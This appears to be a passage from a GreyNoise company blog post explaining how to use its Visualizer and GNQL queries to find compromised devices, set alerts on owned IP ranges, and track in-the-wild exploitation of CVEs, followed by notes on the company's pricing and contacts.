Let's say I want to find compromised devices that belong to ME, my users, or just some interesting network around the world.

Just punch in a GNQL query into the web interface of the IP block I'm interested in + the facet: "classification:malicious"

Example of GreyNoise Visualizer showing malicious scanning from devices within an IP address range

You can actually also find compromised devices in other facets as well. Here are examples of finding compromised devices in a specific country or using free text search to find compromised devices in hospitals or government facilities (or both):

Example of GreyNoise Visualizer showing malicious IP addresses related to government
Example of GreyNoise Visualizer showing malicious IP addresses related to hospitals
Example of GreyNoise Visualizer showing malicious IP addresses from a country related to hospitals

You can use your FREE GreyNoise account to register alerts on any network block or IPs. Once you've registered your alerts, we email you if we see any of your IPs get compromised (e.g., unexpectedly start scanning the internet )

https://viz.greynoise.io/account/alerts

Example of GreyNoise Visualizer showing how to set up Alerts

3. Emerging vulnerability exploitation

You can use GreyNoise to find whether a given vulnerability is being opportunistically exploited or "vuln checked" at scale. Simply craft a GNQL query for CVE.

https://viz.greynoise.io/query/cve:CVE-2021-3129

Example of GreyNoise Visualizer showing malicious IP addresses related to a CVE

When a big scary vulnerability is announced, basically everyone has the exact same thought:

"How much do I **really** have to care about this? Is this... being exploited in the wild right now?"

GreyNoise is declaring war on this ambiguity.

You can also see *which* CVEs a given IP address is probing the internet for or opportunistically exploiting. This list is not exhaustive - it takes a lot of work to add coverage to these. This is what @ackmage @nathanqthai and @4b4c41 do.

Example of GreyNoise Visualizer for a malicious IP address showing targeted CVEs

Our Business Model

We have a long ways to go on properly productizing this offering. It's really hard to do at scale, and not every vulnerability can be exploited in a way that GreyNoise will ever see. That said, we'll be announcing some new offerings focusing on this use case later this year.

Our business model is pretty simple:

  • Most viz stuff == free but rate limited
  • Community API == free but rate limited
  • GreyNoise in your SIEM/TIP/SOAR == paid

Expect a lot of this stuff to shift over the next few months/years as we find better ways to price/package our features.

That pretty much covers it.

Here are my asks to you:

  • If you use GreyNoise's free products, get in touch with @SupriyaMaz and she'll hook you up with free swag
  • If you work in SOC/TI or at an MSSP and want to hear about our commercial offering, ping sales@greynoise.io

And, of course, ping me anytime. I can't promise a snappy response, but I try to clear my inbox at least every few weeks (aspirational). My email is andrew@greynoise.io.

Oh, last thing. We tag like... hundreds of activities and actors and exploits and vuln probes and tools. Check them all out here (it's searchable, but the layout is pretty unwieldy considering how massive our tag library is now).

https://viz.greynoise.io/tags

Some of the activities and actors and exploits and vuln probes GreyNoise has identified

Onward.

--Andrew

No blog articles found

Please update your search term or select a different category and try again.

Get started today